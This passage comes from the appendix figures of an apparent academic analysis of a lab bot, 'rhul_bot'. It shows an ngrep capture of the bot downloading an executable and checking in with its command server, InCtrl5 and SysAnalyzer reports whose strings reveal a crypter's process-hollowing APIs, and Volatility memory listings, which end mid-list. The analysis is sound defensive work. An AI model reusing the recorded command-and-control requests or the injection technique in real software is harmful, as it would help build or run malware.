172.16.5.180:80 [AP] GET /newversion.exe HTTP/1.1..User-Agent: InetURL/1.0..Host: 172.16.5.180.. .. ## T 172.16.5.180:80 -> 192.168.0.125:1093 [A] HTTP/1.1 200 OK..Date: Tue, 25 Jan 2011 15:19:25 GMT..Server: Apache/2.2.3 (Red Hat)..Last-Modified: Tue, 25 Jan 2011 15:14:33 GMT..ETag: "188ac1- 3a03 3-2c792840"..Accept-Ranges: bytes..Content-Length: 237619..Connection: clos e..Content-Type: application/octet- stream....MZ...... @...... !..L.!This program cannot be run in DOS mode....$...... #8.jgY.9gY.9gY.9gY.9aY.9.F.9fY.9.E.9uY.9.F.9?Y.9.F.9

nY.9gY.9.Y.93z.9pY.9RichgY.9...... PE..L.....?M......

...... @......

...... x......

...... 8...... text...... `.rdata...... @[email protected].

...... `...... @....idata...... p...... @....reloc ...... @..B......

......

...... ......

...... NB10...... ?M....C:\vss\rhul_bot\ Debug\rhul_bot.pdb. # T 192.168.0.125:1093 -> 172.16.5.180:80 [A] ...... # T 192.168.0.125:1093 -> 172.16.5.180:80 [AF] ...... #### T 192.168.0.125:1094 -> 172.16.5.180:80 [A] ...... # T 192.168.0.125:1094 -> 172.16.5.180:80 [AP] get /cgi-bin/a?a=join|57|steve|.. ## T 172.16.5.180:80 -> 192.168.0.125:1094 [AP] |ack|57| ## T 192.168.0.125:1094 -> 172.16.5.180:80 [A] get /c # T 192.168.0.125:1094 -> 172.16.5.180:80 [AF] ...... #ex ^Cexit 2384 received, 0 dropped sh-3.2# exit exit

Script done on Tue Jan 25 15:22:54 2011

Figure 46 – Full output of ngrep session

From investigation of malware that is known not to be armored

Installation Report: Generated by InCtrl5, version 1.0.0.0 Install program: C:\Documents and Settings\steve\Desktop\rhul_bot.release.armored.ntcrypt.171.exe 2/3/2011 4:14 AM

Contents

 Registry  Disk Contents  Ini Files  Text Files

Registry

Keys ignored: 0

 (none)

Values added: 8 HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache "@C:\WINDOWS\system32\SHELL32.dll,-9319" Type: REG_SZ Data: Printers and Faxes HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache "@explorer.exe,-7020" Type: REG_SZ Data: &Search HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache "@explorer.exe,-7021" Type: REG_SZ Data: &Help and Support HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache "@explorer.exe,-7023" Type: REG_SZ Data: &Run... HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache "@shell32.dll,-12710" Type: REG_SZ Data: &Run HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache "@shell32.dll,-21779" Type: REG_SZ Data: My Pictures HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache "@shell32.dll,-21790" Type: REG_SZ Data: My Music HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache "C:\WINDOWS\System32\taskmgr.exe" Type: REG_SZ Data: Windows TaskManager

Values changed: 4 HKEY_CURRENT_USER\SessionInformation "ProgramCount" Old type: REG_DWORD 95

New type: REG_DWORD Old data: 04, 00, 00, 00 New data: 03, 00, 00, 00 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700- EF1F-11D0-9888-006097DEACF9}\Count "HRZR_EHACNGU" Old type: REG_BINARY New type: REG_BINARY Old data: 05, 00, 00, 00, 3D, 00, 00, 00, 00, A9, 15, BA, 9B, C3, CB, 01 New data: 05, 00, 00, 00, 3E, 00, 00, 00, 30, CB, CB, D9, 9B, C3, CB, 01 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700- EF1F-11D0-9888-006097DEACF9}\Count "HRZR_EHACNGU:P:\JVAQBJF\Flfgrz32\gnfxzte.rkr" Old type: REG_BINARY New type: REG_BINARY Old data: 05, 00, 00, 00, 0F, 00, 00, 00, 00, DC, EC, B4, 9B, C3, CB, 01 New data: 05, 00, 00, 00, 10, 00, 00, 00, 30, CB, CB, D9, 9B, C3, CB, 01 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG "Seed" Old type: REG_BINARY New type: REG_BINARY Old data: F5, 23, FF, 6A, A3, 0B, 33, 8D, 8C, 00, CE, 86, 37, F1, AC, 74, C7, 7E, 63, 10, A2, B1, 72, 0D, B0, C8, 15, A7, F6, 4E, 0E, FD, 96, 71, 24, 8F, DD, 45, E8, A2, C6, C3, B4, 29, 19, EE, 43, 43, 3F, E0, B6, 0F, 35, F3, F0, 9B, 95, D9, A3, BF, F8, 42, 05, E4, F1, 67, AE, 17, DB, 9F, 94, 35, 74, 34, 09, 91, A1, 18, C6, 5F New data: 94, F9, AF, 87, 72, F0, 32, A0, 91, 4D, 08, 77, 16, 10, AC, 53, D4, D2, 68, 6E, 6B, EC, 40, 8C, 19, 19, 6C, 78, A0, 23, 92, C4, BB, 3C, E3, AD, D5, 43, F7, 14, 59, 5F, 4B, F7, 14, 76, 0B, 58, 2F, D8, 66, 66, 12, 14, A2, 8A, CE, BB, 06, 5C, AA, 49, E2, 7F, 51, 96, 2C, 5A, 41, 62, 74, 2E, DC, 95, 7F, 4D, 8B, C2, F4, AA To Contents

Disk contents

Drives tracked: 1

 c:\

Files changed: 4 c:\Documents and Settings\steve\ntuser.dat.LOG Old date: 2/3/2011 4:13 AM New date: 2/3/2011 4:14 AM Old size: 1,024 bytes New size: 1,024 bytes c:\WINDOWS\Prefetch\RHUL_BOT.RELEASE.ARMORED.NTCR-14459E08.pf Old date: 2/3/2011 4:10 AM New date: 2/3/2011 4:13 AM Old size: 13,444 bytes New size: 13,010 bytes c:\WINDOWS\system32\config\software.LOG 96

Old date: 2/3/2011 4:13 AM New date: 2/3/2011 4:13 AM Old size: 1,024 bytes New size: 1,024 bytes c:\WINDOWS\system32\config\system.LOG Old date: 2/3/2011 4:13 AM New date: 2/3/2011 4:13 AM Old size: 20,480 bytes New size: 1,024 bytes To Contents

INI file

Ini files tracked: 4

 C:\boot.ini  c:\windows\control.ini  c:\windows\system.ini  c:\windows\win.ini

To Contents

Text file

Text files tracked: 2

 c:\windows\system32\autoexec.nt  c:\windows\system32\config.nt

To Contents

Figure 47 – Full output of Inctrl5

Processes: PID ParentPID User Path ------1256 1332 STEVE-G4LZVXOU0:steve C:\Documents and Settings\steve\Desktop\rhul_bot.release.armored.ntcrypt.171.exe

Ports: Port PID Type Path ------

Explorer Dlls: DLL Path Company Name File Description ------No changes Found

IE Dlls: DLL Path Company Name File Description 97

------No changes Found

Loaded Drivers: Driver File Company Name Description ------

Monitored RegKeys Registry Key Value ------

Kernel31 Api Log

------***** Installing Hooks ***** 71ab4401 RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\WinSock2\Parameters) 71ab4c59 RegOpenKeyExA (Protocol_Catalog9) 71ab457f RegOpenKeyExA (00000007) 71ab4650 RegOpenKeyExA (Catalog_Entries) 71ab4952 RegOpenKeyExA (000000000001) 71ab4952 RegOpenKeyExA (000000000002) 71ab4952 RegOpenKeyExA (000000000003) 71ab4952 RegOpenKeyExA (000000000004) 71ab4952 RegOpenKeyExA (000000000005) 71ab4952 RegOpenKeyExA (000000000006) 71ab4952 RegOpenKeyExA (000000000007) 71ab4952 RegOpenKeyExA (000000000008) 71ab4952 RegOpenKeyExA (000000000009) 71ab4952 RegOpenKeyExA (000000000010) 71ab4952 RegOpenKeyExA (000000000011) 71ab4952 RegOpenKeyExA (000000000012) 71ab1779 WaitForSingleObject(79c,0) 71ab4e6d RegOpenKeyExA (NameSpace_Catalog5) 71ab457f RegOpenKeyExA (00000004) 71ab4797 RegOpenKeyExA (Catalog_Entries) 71ab4efa RegOpenKeyExA (000000000001) 71ab4efa RegOpenKeyExA (000000000002) 71ab4efa RegOpenKeyExA (000000000003) 71ab1779 WaitForSingleObject(794,0) 71aa16bd RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\Winsock2\Parameters) 71aa157c GlobalAlloc() 77e802f3 ExitThread() 7342e286 GetCommandLineA() 7342ed24 GetVersionExA() 77dd953b GetVersionExA() 5ad78000 GetCurrentProcessId()=1256 5ad78a58 IsDebuggerPresent() 7342f0b9 LoadLibraryA(OLEAUT32.DLL)=77120000 771c7de0 LoadLibraryA(oleaut32.dll)=77120000 7343090f RegOpenKeyA (HKLM\SOFTWARE\Microsoft\VBA\Monitors) 77dd5f00 RegOpenKeyExA (HKLM\SOFTWARE\Microsoft\VBA\Monitors) 73445911 CreateFileA(C:\Documents and Settings\steve\Desktop\rhul_bot.release.armored.ntcrypt.171.exe) 7344dc9f ReadFile()

DirwatchData

------WatchDir Initilized OK Watching C:\DOCUME~1\steve\LOCALS~1\Temp Watching C:\WINDOWS Watching C:\Program Files Created: C:\DOCUME~1\steve\LOCALS~1\Temp\JETD1DE.tmp Created: C:\DOCUME~1\steve\LOCALS~1\Temp\JETD.tmp Deteled: C:\DOCUME~1\steve\LOCALS~1\Temp\JETD.tmp Deteled: C:\DOCUME~1\steve\LOCALS~1\Temp\JETD1DE.tmp File: rhul_bot.release.armored.ntcrypt.171.exe Size: 114693 Bytes MD5: 5CEF7C43361D2B7152E59ED49E629D36 98

Packer: File not found C:\iDEFENSE\SysAnalyzer\peid.exe

File Properties: CompanyName FileDescription FileVersion 0.00.0011 InternalName Res LegalCopyright OriginalFilename Res.exe ProductName ProductVersion

Exploit Signatures: ------Scanning for 19 signatures Scan Complete: 32Kb in 0 seconds Urls ------

RegKeys ------

ExeRefs ------File: rhul_bot.release.armored.ntcrypt.171_dmp.exe_ .exe Res.exe

Raw Strings: ------File: rhul_bot.release.armored.ntcrypt.171_dmp.exe_ MD5: 61bf0ce111b3f8610d27101c9367dc01 Size: 32770

Ascii Strings: ------!This program cannot be run in DOS mode. RichA .text `.data .rsrc MSVBVM60.DLL [QsrKPsn FDss RsaTQs TQso EDsn PssADs6}Rs [Qs{ Pss{Rs `Os0XQsaUQs |Rs? Psn[Ps Ps*-Ps QsFUDsL|Rs4 UQs-XPs ADstEDs UQsgWPs PsPOQs [Ps"DDsj Stub VB5! VB6ES.DLL Sub Main Stub mMain mRunPE mRC4 Stub kernel32 CreateProcessA WriteProcessMemory RtlMoveMemory user32 __vbaVarZero CallWindowProcA GetProcAddress LoadLibraryA VBA6.DLL __vbaAryDestruct __vbaErase __vbaAryMove __vbaPowerR8 __vbaFreeVarList 99

__vbaInStr __vbaLenBstr __vbaFileClose __vbaFreeVar __vbaFreeStr __vbaStrVarMove __vbaStrCopy __vbaFreeObjList __vbaFreeStrList __vbaHresultCheckObj __vbaNew2 __vbaStrCat __vbaStrMove __vbaFileOpen __vbaOnError __vbaVarAdd __vbaR8Var __vbaFpI4 __vbaVarIndexLoad __vbaI4Var __vbaRecAnsiToUni __vbaRecUniToAnsi __vbaAryUnlock __vbaAryLock __vbaVarMove __vbaRedim __vbaGosubFree __vbaGosubReturn __vbaUI1Str __vbaVarCat __vbaStrVarVal __vbaVarDup __vbaVarVargNofree __vbaStrI4 __vbaStrToUnicode __vbaSetSystemError __vbaStrToAnsi __vbaGosub __vbaStrVarCopy __vbaUbound __vbaAryConstruct2 __vbaVar2Vec __vbaStrCmp =TT@ hTT@ } jPh =TT@ hTT@ } jXh =TT@ hTT@ } jPh =TT@ hTT@ } jXh h-)@ h'.@ Ph, @ PhT @ ,SVW %,P@ Yf95,P@ 6h$"@ %0P@ 5`P@ 9-0P@ [_^] @SVW 5DP@ =&P@ 5(P@ 5&P@ ueVWf =`P@ 5$P@ =$P@ =&P@ 0SVW ,SVW hpC@ MSVBVM60.DLL _CIcos _adj_fptan __vbaStrI4 __vbaVarMove __vbaVarVargNofree __vbaFreeVar __vbaAryMove __vbaGosubReturn __vbaStrVa rMove __vbaLenBstr __vbaFreeVarList _adj_fdiv_m64 __vbaFreeObjList 100

_adj_fprem1 __vbaRecAnsiToUni __vbaStrCat __vbaSetSystemError __vbaHresultCheckObj _adj_fdiv_m32 __vbaAryDestruct __vbaOnError _adj_fdiv_m16i _adj_fdivr_m16i __vbaVarIndexLoad _CIsin __vbaErase __vbaVarZero __vbaChkstk __vbaGosubFree __vbaFileClose __vbaStrCmp __vbaAryConstruct2 DllFunctionCall _adj_fpatan __vbaRedim __vbaRecUniToAnsi _CIsqrt __vbaExceptHandler __vbaStrToUnicode _adj_fprem _adj_fdivr_m64 __vbaGosub __vbaFPException __vbaUbound __vbaStrVarVal __vbaVarCat _CIlog __vbaFileOpen __vbaVar2Vec __vbaNew2 __vbaInStr _adj_fdiv_m32i _adj_fdivr_m32i __vbaStrCopy __vbaFreeStrList _adj_fdivr_m32 __vbaPowerR8 __vbaR8Var _adj_fdiv_r __vbaI4Var __vbaAryLock __vbaVarAdd __vbaStrToAnsi __vbaVarDup __vbaFpI4 _CIatan __vbaUI1Str __vbaStrMove __vbaStrVarCopy _allmul _CItan __vbaAryUnlock _CIexp __vbaFreeStr CsxP& 1u

Unicode Strings: ------@*\AD:\Pen Drive\NT Crypter 2 Beta 3\Stub\Project1.vbp .exe XXXXX AAAAA kernel32 101

RtlMoveMemory CreateProcessW ntdll NtUnmapViewOfSection VirtualAllocEx WriteProcessMemory GetThreadContext SetThreadContext ResumeThread jjjj @*\AD:\Pen Drive\NT Crypter 2 Beta 3\Stub\Project1.vbp VS_VERSION_INFO VarFileInfo Translation StringFileInfo 0C0A04B0 Comments

CompanyName

FileDescription

LegalCopyright

LegalTrademarks

ProductName

FileVersion 0.00.0011 ProductVersion 0.00.0011 InternalName OriginalFilename Res.exe

Figure 48 – Full output of SysAnalyzer

Script started on Sat Feb 5 15:27:13 2011 bash-3.2$ pwd /Users/steve/Downloads bash-3.2$ cd Volatility-1.3_Beta bash-3.2$ python volatility ident -f../memory.img Image Name: ../memory.img Image Type: VM Type: nopae DTB: 0x39000 Datetime: Sat Feb 05 09:50:35 2011 bash-3.2$ bash-3.2$ python volatility pslist -f ../memory.img Name Pid PPid Thds Hnds Time System 4 0 52 240 Thu Jan 01 00:00:00 1970 smss.exe 800 4 3 21 Sat Feb 05 16:25:30 2011 csrss.exe 888 800 9 280 Sat Feb 05 16:25:32 2011 winlogon.exe 912 800 17 424 Sat Feb 05 16:25:33 2011 services.exe 956 912 16 273 Sat Feb 05 16:25:33 2011 lsass.exe 968 912 20 314 Sat Feb 05 16:25:33 2011 svchost.exe 1148 956 9 228 Sat Feb 05 16:25:33 2011 svchost.exe 1276 956 65 988 Sat Feb 05 16:25:33 2011 svchost.exe 1568 956 4 82 Sat Feb 05 16:25:34 2011 svchost.exe 1592 956 14 156 Sat Feb 05 16:25:34 2011 spoolsv.exe 1788 956 10 132 Sat Feb 05 16:25:35 2011 acs.exe 1960 956 5 103 Sat Feb 05 16:25:42 2011 explorer.exe 1656 608 11 260 Sat Feb 05 16:33:30 2011 msmsgs.exe 792 1656 3 120 Sat Feb 05 16:33:32 2011 wuauclt.exe 484 1276 5 138 Sat Feb 05 16:34:00 2011 rhul_bot.releas 452 472 1 29 Sat Feb 05 17:24:35 2011 Nigilant32.exe 816 1656 4 99 Sat Feb 05 17:50:13 2011 bash-3.2$ python volatility connections -f ../memory.img bash-3.2$ bash-3.2$ python volatility dlllist -f ../memory.img 102

************************************************************************ System pid: 4 Unable to read PEB for task. ************************************************************************ smss.exe pid: 800 Command line : \SystemRoot\System32\smss.exe

Base Size Path 0x48580000 0xe000 \SystemRoot\System32\smss.exe 0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll

************************************************************************ csrss.exe pid: 888 Command line : C:\WINDOWS\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,3072,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off MaxRequestThreads=16

Base Size Path 0x4a680000 0x4000 \??\C:\WINDOWS\system32\csrss.exe 0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll 0x75b40000 0xa000 C:\WINDOWS\system32\CSRSRV.dll 0x75b50000 0xe000 C:\WINDOWS\system32\basesrv.dll 0x75b60000 0x46000 C:\WINDOWS\system32\winsrv.dll 0x77d40000 0x8d000 C:\WINDOWS\system32\USER32.dll 0x77e60000 0xe5000 C:\WINDOWS\system32\KERNEL32.dll 0x77c70000 0x40000 C:\WINDOWS\system32\GDI32.dll 0x77dd0000 0x8b000 C:\WINDOWS\system32\ADVAPI32.dll 0x77cc0000 0x75000 C:\WINDOWS\system32\RPCRT4.dll 0x75e90000 0xa1000 C:\WINDOWS\System32\sxs.dll

************************************************************************ winlogon.exe pid: 912 Command line : winlogon.exe

Base Size Path 0x1000000 0x6e000 \??\C:\WINDOWS\system32\winlogon.exe 0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll 0x77e60000 0xe5000 C:\WINDOWS\system32\kernel32.dll 0x77dd0000 0x8b000 C:\WINDOWS\system32\ADVAPI32.dll 0x77cc0000 0x75000 C:\WINDOWS\system32\RPCRT4.dll 0x76cc0000 0x10000 C:\WINDOWS\system32\AUTHZ.dll 0x77c10000 0x53000 C:\WINDOWS\system32\msvcrt.dll 0x762c0000 0x8a000 C:\WINDOWS\system32\CRYPT32.dll 0x77d40000 0x8d000 C:\WINDOWS\system32\USER32.dll 0x77c70000 0x40000 C:\WINDOWS\system32\GDI32.dll 0x762a0000 0xf000 C:\WINDOWS\system32\MSASN1.dll 0x75940000 0x7000 C:\WINDOWS\system32\NDdeApi.dll 0x75930000 0xa000 C:\WINDOWS\system32\PROFMAP.dll 0x71c20000 0x4f000 C:\WINDOWS\system32\NETAPI32.dll 0x75a70000 0xa3000 C:\WINDOWS\system32\USERENV.dll 0x76bf0000 0xb000 C:\WINDOWS\system32\PSAPI.DLL 0x76bc0000 0xe000 C:\WINDOWS\system32\REGAPI.dll 0x76f90000 0x10000 C:\WINDOWS\system32\Secur32.dll 0x76670000 0xe4000 C:\WINDOWS\system32\SETUPAPI.dll 0x76c60000 0x29000 C:\WINDOWS\system32\sfc_os.dll 0x76c30000 0x2b000 C:\WINDOWS\system32\WINTRUST.dll 0x771b0000 0x11a000 C:\WINDOWS\system32\ole32.dll 0x76c90000 0x22000 C:\WINDOWS\system32\IMAGEHLP.dll 0x77c00000 0x7000 C:\WINDOWS\system32\VERSION.dll 0x76360000 0xf000 C:\WINDOWS\system32\WINSTA.dll 0x71ab0000 0x15000 C:\WINDOWS\system32\WS2_32.dll 0x71aa0000 0x8000 C:\WINDOWS\system32\WS2HELP.dll 0x75970000 0xf1000 C:\WINDOWS\system32\MSGINA.dll 0x773d0000 0x7f4000 C:\WINDOWS\system32\SHELL32.dll 0x772d0000 0x63000 C:\WINDOWS\system32\SHLWAPI.dll 0x77340000 0x8b000 C:\WINDOWS\system32\COMCTL32.dll 103

0x1f7b0000 0x31000 C:\WINDOWS\system32\ODBC32.dll 0x763b0000 0x45000 C:\WINDOWS\system32\comdlg32.dll 0x71950000 0xe4000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\comctl32.dll 0x1f850000 0x16000 C:\WINDOWS\system32\odbcint.dll 0x76bd0000 0x1e000 C:\WINDOWS\system32\SHSVCS.dll 0x76bb0000 0x4000 C:\WINDOWS\system32\sfc.dll 0x723d0000 0x1a000 C:\WINDOWS\system32\WINSCARD.DLL 0x76f50000 0x8000 C:\WINDOWS\system32\WTSAPI32.dll 0x75e90000 0xa1000 C:\WINDOWS\system32\sxs.dll 0x5ad70000 0x34000 C:\WINDOWS\system32\uxtheme.dll 0x76600000 0x1b000 C:\WINDOWS\system32\cscdll.dll 0x75950000 0x19000 C:\WINDOWS\system32\WlNotify.dll 0x76b40000 0x2c000 C:\WINDOWS\system32\WINMM.dll 0x73000000 0x23000 C:\WINDOWS\system32\WINSPOOL.DRV 0x71b20000 0x11000 C:\WINDOWS\system32\MPR.dll 0xffd0000 0x22000 C:\WINDOWS\System32\rsaenh.dll 0x71bf0000 0x11000 C:\WINDOWS\system32\SAMLIB.dll 0x76d10000 0x1d000 C:\WINDOWS\system32\msv1_0.dll 0x76f60000 0x2c000 C:\WINDOWS\system32\wldap32.dll 0x76620000 0x4e000 C:\WINDOWS\system32\cscui.dll 0x77050000 0xc5000 C:\WINDOWS\system32\COMRes.dll 0x77120000 0x8b000 C:\WINDOWS\system32\OLEAUT32.dll 0x76fd0000 0x78000 C:\WINDOWS\system32\CLBCATQ.DLL 0x76ce0000 0x1f000 C:\WINDOWS\system32\NTMARTA.DLL

************************************************************************ services.exe pid: 956 Command line : C:\WINDOWS\system32\services.exe

Base Size Path 0x1000000 0x1b000 C:\WINDOWS\system32\services.exe 0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll 0x77e60000 0xe5000 C:\WINDOWS\system32\kernel32.dll 0x77c10000 0x53000 C:\WINDOWS\system32\msvcrt.dll 0x77dd0000 0x8b000 C:\WINDOWS\system32\ADVAPI32.dll 0x77cc0000 0x75000 C:\WINDOWS\system32\RPCRT4.dll 0x77d40000 0x8d000 C:\WINDOWS\system32\USER32.dll 0x77c70000 0x40000 C:\WINDOWS\system32\GDI32.dll 0x75a70000 0xa3000 C:\WINDOWS\system32\USERENV.dll 0x758e0000 0x4d000 C:\WINDOWS\system32\SCESRV.dll 0x76cc0000 0x10000 C:\WINDOWS\system32\AUTHZ.dll 0x758c0000 0x1c000 C:\WINDOWS\system32\umpnpmgr.dll 0x76360000 0xf000 C:\WINDOWS\system32\WINSTA.dll 0x5f770000 0xe000 C:\WINDOWS\system32\NCObjAPI.DLL 0x76f90000 0x10000 C:\WINDOWS\system32\secur32.dll 0x758a0000 0xf000 C:\WINDOWS\system32\eventlog.dll 0x71ab0000 0x15000 C:\WINDOWS\system32\WS2_32.dll 0x71aa0000 0x8000 C:\WINDOWS\system32\WS2HELP.dll 0x76bf0000 0xb000 C:\WINDOWS\system32\PSAPI.DLL 0x76f50000 0x8000 C:\WINDOWS\system32\wtsapi32.dll 0x71c20000 0x4f000 C:\WINDOWS\system32\netapi32.dll

************************************************************************ lsass.exe pid: 968 Command line : UNKNOWN

Base Size Path 0x1000000 0x5000 UNKNOWN 0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll 0x77e60000 0xe5000 C:\WINDOWS\system32\kernel32.dll 0x77dd0000 0x8b000 C:\WINDOWS\system32\ADVAPI32.dll 0x77cc0000 0x75000 C:\WINDOWS\system32\RPCRT4.dll 0x74520000 0xa7000 C:\WINDOWS\system32\LSASRV.dll 0x77c10000 0x53000 C:\WINDOWS\system32\msvcrt.dll 0x76f90000 0x10000 C:\WINDOWS\system32\Secur32.dll 0x77d40000 0x8d000 C:\WINDOWS\system32\USER32.dll 0x77c70000 0x40000 C:\WINDOWS\system32\GDI32.dll 0x74440000 0x69000 C:\WINDOWS\system32\SAMSRV.dll 104

0x76790000 0xb000 C:\WINDOWS\system32\cryptdll.dll 0x76f20000 0x25000 C:\WINDOWS\system32\DNSAPI.dll 0x71ab0000 0x15000 C:\WINDOWS\system32\WS2_32.dll 0x71aa0000 0x8000 C:\WINDOWS\system32\WS2HELP.dll 0x762a0000 0xf000 C:\WINDOWS\system32\MSASN1.dll 0x71c20000 0x4f000 C:\WINDOWS\system32\NETAPI32.dll 0x71bf0000 0x11000 C:\WINDOWS\system32\SAMLIB.dll 0x71b20000 0x11000 C:\WINDOWS\system32\MPR.dll 0x767a0000 0x13000 C:\WINDOWS\system32\NTDSAPI.dll 0x76f60000 0x2c000 C:\WINDOWS\system32\WLDAP32.dll 0x743b0000 0xd000 C:\WINDOWS\system32\msprivs.dll 0x71cf0000 0x44000 C:\WINDOWS\system32\kerberos.dll 0x76d10000 0x1d000 C:\WINDOWS\system32\msv1_0.dll 0x744b0000 0x63000 C:\WINDOWS\system32\netlogon.dll 0x767c0000 0x2a000 C:\WINDOWS\system32\w32time.dll 0x76080000 0x61000 C:\WINDOWS\system32\MSVCP60.dll 0x76d60000 0x15000 C:\WINDOWS\system32\iphlpapi.dll 0x76de0000 0x26000 C:\WINDOWS\system32\netman.dll 0x76d40000 0x16000 C:\WINDOWS\system32\MPRAPI.dll 0x76e40000 0x2f000 C:\WINDOWS\system32\ACTIVEDS.dll 0x76e10000 0x24000 C:\WINDOWS\system32\adsldpc.dll 0x76b20000 0x15000 C:\WINDOWS\system32\ATL.DLL 0x771b0000 0x11a000 C:\WINDOWS\system32\ole32.dll 0x77120000 0x8b000 C:\WINDOWS\system32\OLEAUT32.dll 0x76e80000 0xd000 C:\WINDOWS\system32\rtutils.dll 0x76670000 0xe4000 C:\WINDOWS\system32\SETUPAPI.dll 0x76ee0000 0x37000 C:\WINDOWS\system32\RASAPI32.dll 0x76e90000 0x11000 C:\WINDOWS\system32\rasman.dll 0x76eb0000 0x2a000 C:\WINDOWS\system32\TAPI32.dll 0x772d0000 0x63000 C:\WINDOWS\system32\SHLWAPI.dll 0x76b40000 0x2c000 C:\WINDOWS\system32\WINMM.dll 0x773d0000 0x7f4000 C:\WINDOWS\system32\SHELL32.dll 0x76da0000 0x30000 C:\WINDOWS\system32\WZCSvc.DLL 0x76d30000 0x4000 C:\WINDOWS\system32\WMI.dll 0x76d80000 0x1a000 C:\WINDOWS\system32\DHCPCSVC.DLL 0x762c0000 0x8a000 C:\WINDOWS\system32\CRYPT32.dll 0x76f50000 0x8000 C:\WINDOWS\system32\WTSAPI32.dll 0x76360000 0xf000 C:\WINDOWS\system32\WINSTA.dll 0x75a70000 0xa3000 C:\WINDOWS\system32\USERENV.dll 0x71950000 0xe4000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\comctl32.dll 0x77340000 0x8b000 C:\WINDOWS\system32\comctl32.dll 0x767f0000 0x24000 C:\WINDOWS\system32\schannel.dll 0x74380000 0xf000 C:\WINDOWS\system32\wdigest.dll 0xffd0000 0x22000 C:\WINDOWS\System32\rsaenh.dll 0x74410000 0x2d000 C:\WINDOWS\system32\scecli.dll 0x743e0000 0x27000 C:\WINDOWS\system32\ipsecsvc.dll 0x745d0000 0xb7000 C:\WINDOWS\system32\oakley.DLL 0x74370000 0xa000 C:\WINDOWS\system32\WINIPSEC.DLL 0x743a0000 0x9000 C:\WINDOWS\system32\pstorsvc.dll 0x71a50000 0x3b000 C:\WINDOWS\system32\mswsock.dll 0x71a90000 0x8000 C:\WINDOWS\System32\wshtcpip.dll 0x743c0000 0x17000 C:\WINDOWS\system32\psbase.dll 0xffa0000 0x21000 C:\WINDOWS\System32\dssenh.dll

************************************************************************ svchost.exe pid: 1148 Command line : C:\WINDOWS\system32\svchost -k rpcss

Base Size Path 0x1000000 0x6000 C:\WINDOWS\system32\svchost.exe 0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll 0x77e60000 0xe5000 C:\WINDOWS\system32\kernel32.dll 0x77dd0000 0x8b000 C:\WINDOWS\system32\ADVAPI32.dll 0x77cc0000 0x75000 C:\WINDOWS\system32\RPCRT4.dll 0x75850000 0x42000 c:\windows\system32\rpcss.dll 0x77c10000 0x53000 C:\WINDOWS\system32\msvcrt.dll 0x71ab0000 0x15000 c:\windows\system32\WS2_32.dll 0x71aa0000 0x8000 c:\windows\system32\WS2HELP.dll 0x77d40000 0x8d000 C:\WINDOWS\system32\USER32.dll 105

0x77c70000 0x40000 C:\WINDOWS\system32\GDI32.dll 0x76f90000 0x10000 c:\windows\system32\Secur32.dll 0x75a70000 0xa3000 C:\WINDOWS\system32\userenv.dll 0x71a50000 0x3b000 C:\WINDOWS\system32\mswsock.dll 0x71a90000 0x8000 C:\WINDOWS\System32\wshtcpip.dll 0x76f20000 0x25000 C:\WINDOWS\system32\DNSAPI.dll 0x76d60000 0x15000 C:\WINDOWS\system32\iphlpapi.dll 0x76de0000 0x26000 C:\WINDOWS\system32\netman.dll 0x76d40000 0x16000 C:\WINDOWS\system32\MPRAPI.dll 0x76e40000 0x2f000 C:\WINDOWS\system32\ACTIVEDS.dll 0x76e10000 0x24000 C:\WINDOWS\system32\adsldpc.dll 0x71c20000 0x4f000 C:\WINDOWS\system32\NETAPI32.dll 0x76f60000 0x2c000 C:\WINDOWS\system32\WLDAP32.dll 0x76b20000 0x15000 C:\WINDOWS\system32\ATL.DLL 0x771b0000 0x11a000 C:\WINDOWS\system32\ole32.dll 0x77120000 0x8b000 C:\WINDOWS\system32\OLEAUT32.dll 0x76e80000 0xd000 C:\WINDOWS\system32\rtutils.dll 0x71bf0000 0x11000 C:\WINDOWS\system32\SAMLIB.dll 0x76670000 0xe4000 C:\WINDOWS\system32\SETUPAPI.dll 0x76ee0000 0x37000 C:\WINDOWS\system32\RASAPI32.dll 0x76e90000 0x11000 C:\WINDOWS\system32\rasman.dll 0x76eb0000 0x2a000 C:\WINDOWS\system32\TAPI32.dll 0x772d0000 0x63000 C:\WINDOWS\system32\SHLWAPI.dll 0x76b40000 0x2c000 C:\WINDOWS\system32\WINMM.dll 0x773d0000 0x7f4000 C:\WINDOWS\system32\SHELL32.dll 0x76da0000 0x30000 C:\WINDOWS\system32\WZCSvc.DLL 0x76d30000 0x4000 C:\WINDOWS\system32\WMI.dll 0x76d80000 0x1a000 C:\WINDOWS\system32\DHCPCSVC.DLL 0x762c0000 0x8a000 C:\WINDOWS\system32\CRYPT32.dll 0x762a0000 0xf000 C:\WINDOWS\system32\MSASN1.dll 0x76f50000 0x8000 C:\WINDOWS\system32\WTSAPI32.dll 0x76360000 0xf000 C:\WINDOWS\system32\WINSTA.dll 0x71950000 0xe4000 